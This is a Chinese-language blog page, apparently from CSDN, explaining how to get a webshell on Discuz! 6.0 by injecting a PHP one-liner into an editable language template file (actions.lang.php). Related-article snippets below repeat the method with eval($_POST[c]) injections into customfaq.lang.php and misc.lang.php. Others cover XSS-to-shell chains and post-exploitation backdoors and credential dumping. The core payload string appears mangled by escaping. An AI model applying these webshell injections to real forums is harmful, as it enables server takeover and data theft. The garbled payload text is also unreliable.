Discuz!6.0后台拿shell

最新推荐文章于 2025-07-30 19:52:43 发布
最新推荐文章于 2025-07-30 19:52:43 发布
阅读量762 收藏
点赞数
CC 4.0 BY-SA版权
分类专栏: 网络安全技术 文章标签: shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/linkboy2004/article/details/1924707
本文介绍了一种通过编辑模板实现的代码注入攻击方式。以templates/default/actions.lang.php为例,展示了如何利用特定路径进行代码注入,成功植入并执行一句话木马。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

导读:

  我记得以前看过这个资料,千翻万找总算翻了出来。
  这个前提是可以编辑模板,不然我估计是没什么希望了。
  templates/default/actions.lang.php(以这个为例)
  在最底那提交
  游客/');?>
  
  /'g/'=>/'sdfsdf
  便能写入一句话木马并正常执行.
discuz xss拿shell
Coisini的博客
05-26 1545
Discuz XSS得webshell By racle @tian6.com 欢迎转帖.但请保留版权信息. 受影响版本:Discuz<=6.1.0,gbk+utf+big5 新增加完全JS利用版本,只有一个文件.ajax-racle.js.有效版本提升至DZ6.1(理论上7.0版本都可以,但是6.1以上版本都已经默认打上补丁),新增浏览器版本判断,对方浏览器为IE或FIREFOX都有效. ...
后台拿webshell的常用方法总结
1匹黑马
04-08 1606
后台拿webshell的常用方法总结 一、直接上传获得webshell 这种对php和jsp的一些程序比较常见,MolyX BOARD就是其中一例,直接在心情图标管理上传.php类型,虽然没有提示,其实已经成功了,上传的文 件url应该是http://forums/images/smiles/下,前一阵子的联众游戏站和网易的jsp系统漏洞就可以直接上传jsp文件。文件名是原来的文件名,bo-blo...
[提权技术] Discuz! 6 后台Shell的方法
weixin_34367845的博客
06-29 305
如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:) 1.后台编辑customfaq(customfaq.lang.php文件) 在 Copy code eval($_POST[c]); 2.后台编辑misc(misc.lang.php文件) 把post_reply_quote对应的内容改为 Copy code ";eval($_P...
Discuz! 6 后台Shell的方法
weixin_34405354的博客
01-29 85
如果后台可以在线编辑模板的话,下面的方法就可以拿SHELL了:) 1.后台编辑customfaq(customfaq.lang.php文件) 在 Copy code eval($_POST[c]); 2.后台编辑misc(misc.lang.php文件) 把post_reply_quote对应的内容改为 Copy code ";e...
Discuz!各版本拿Webshell
weixin_34313182的博客
04-01 985
四个版本的漏洞,Discuz! 6.0 、7.0、7.2和X1.5。 传X1.5出0day,最后神马也木见……后t00ls大牛淫们发出了方法和EXP,围观下。 ———————————————– 作者:jsbug 原文地址 长文短说,但是却说来文长。 一、 Discuz! 6.0Discuz! 7.0 既然要后台Shell,文件写入必看。 /i...
Discuz!后台怎么拿到Webshell
Yatere的天平秤
04-25 2308
趁着地球还没毁灭,赶紧放出来。 预祝"单恋一枝花"童鞋生日快乐。 恭喜我的浩方Dota升到2级。 希望世界和平。 我不是标题党,你们敢踩我。敢踩我。。踩我。。。我…… 既然还没跪,我就从Discuz!古老的6.0版本开始,漏洞都出现在扩展插件上,利用方式有所不同,下面开始。 一 Discuz! 6.0Discuz! 7.0 既然要后台Shell,文件写入必看。
mysql注入反弹_Discuz!x xss反弹后台无防御sql注入getshell(附带exploit)
weixin_29915703的博客
01-28 625
### 简要描述:Discuz!x xss反弹后台无防御sql注入getshell,这里的xss只是做一个药引子,因为xss来自日志功能,然而这个日志功能却又默认关闭的,为了测试我们开启它。这个漏洞应该是所有dz通杀的,我下载了最新版本的所以测试通过......### 详细说明:首先我们开启日志功能,然后存储一个xss看看:测试一个xss页面:[](https://images.seebug.or...
Discuz! 6.0-7.0后台Webshell漏洞利用教程
论坛软件不同版本(如2011年及其之前,包括6.0和7.0)的后台获取Webshell漏洞利用技术。Discuz!是一个流行的PHP论坛系统,其安全漏洞常常成为攻击者的目标。文章的核心焦点在于利用Discuz!扩展插件中的漏洞进行文件...
dz 所有版本后台GET SHELL1
08-08
6.0Discuz! 7.0 漏洞利用** 在这两个版本中,漏洞出现在后台的插件管理功能。通过控制`$plugin['identifier']`变量,可以尝试注入恶意代码。因为`identifier`是从`plugins`表中读取的,攻击者可以利用SQL注入...
DZ7.2 19楼蓝色风格定制版
03-09
1、已正确安装discuz!7.2的网站。 2、有一定量的图文数据。 3、对UChome的安装不作要求。 二、操作流程: 1、进入后台,在界面→边栏→全局中关闭边栏;在全局→论坛功能→主题评价中启用主题评价,使用两个...
[Errno 2] 没有那个文件或目录: b‘netstat‘: b‘netstat‘
求知若渴,虚心若愚。
07-29 93
1. 没有netstat 命令,进行安装;2.在执行命令,就不在报错;
red靶场
m0_75212639的博客
07-27 476
状态码为500猜测这个页面可能存在漏洞,使用wfuzz测试一下参数,字典也用github上面提供的字典文件,路径换自己上传文件的地址。下载一下,导入到kali中 命令需要修改文件地址,变为你字典放到kali的位置。前面得出hashcat,将密码保存到pass.txt文件使用hashcat规则进行破解。经过查询,Mr. Miessler是github上的一个字典。先写一个pass.txt,将密码保存到当前路径,再执行命令。页面,进行访问,发现是一片空白,说明存在这个页面。
​Metasploit简介
qq_40379132的博客
07-29 846
本文详细介绍了Metasploit框架的六大核心模块及其渗透测试流程:1. 辅助模块(扫描识别)2. 漏洞利用模块(攻击代码)3. 载荷模块(植入代码)4. 后渗透模块(信息收集)5. 编码模块(免杀处理)。重点演示了针对Linux系统Samba服务的完整攻击链,包括端口扫描、漏洞利用、权限提升(提权至system)、凭证窃取(Hashdump/Mimikatz)以及后门植入技术。文章还系统介绍了Windows/Linux平台下多种后门生成方法(exe/dll/ps1等),并详细讲解了进程迁移、日志清理等后
shell每日三题大神之路:第三天
wzh200506091016的博客
07-28 893
包含了在输入read命令的详细参数解释以及案例,包括在这个过程遇到的知识点。
Linux Shell 命令
wzx77的博客
07-27 1164
AI 汇总,便于速查。
HVV-溯源攻击成果
weixin_53884648的博客
07-30 162
摘要:护网行动中发现了多个攻击IP,经溯源分析发现的安全漏洞。
adb reboot 与 adb shell svc power reboot 的区别
yinhunzw的专栏
07-29 225
总的来说,adb reboot是一个更底层、更直接的重启方式,而adb shell svc power reboot是通过Android系统服务进行的更规范的重启操作。虽然没有看到具体代码,但从Android系统架构可以知道,adb reboot是通过adbd直接调用底层reboot系统调用,不经过Android Framework层。svc命令加载svc.jar并运行com.android.commands.svc.Svc主类。adbd直接调用系统底层的reboot函数。不会触发系统服务的正常关闭流程。
Linux零基础Shell教学全集(可用于日常查询语句,目录清晰,内容详细)(自学尚硅谷B站shell课程后的万字学习笔记,附课程链接)
最新发布
2302_78022640的博客
07-30 363
非常全面,非常详细,非常清晰明了,自学尚硅谷B站shell课程后记录笔记,附课程链接。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值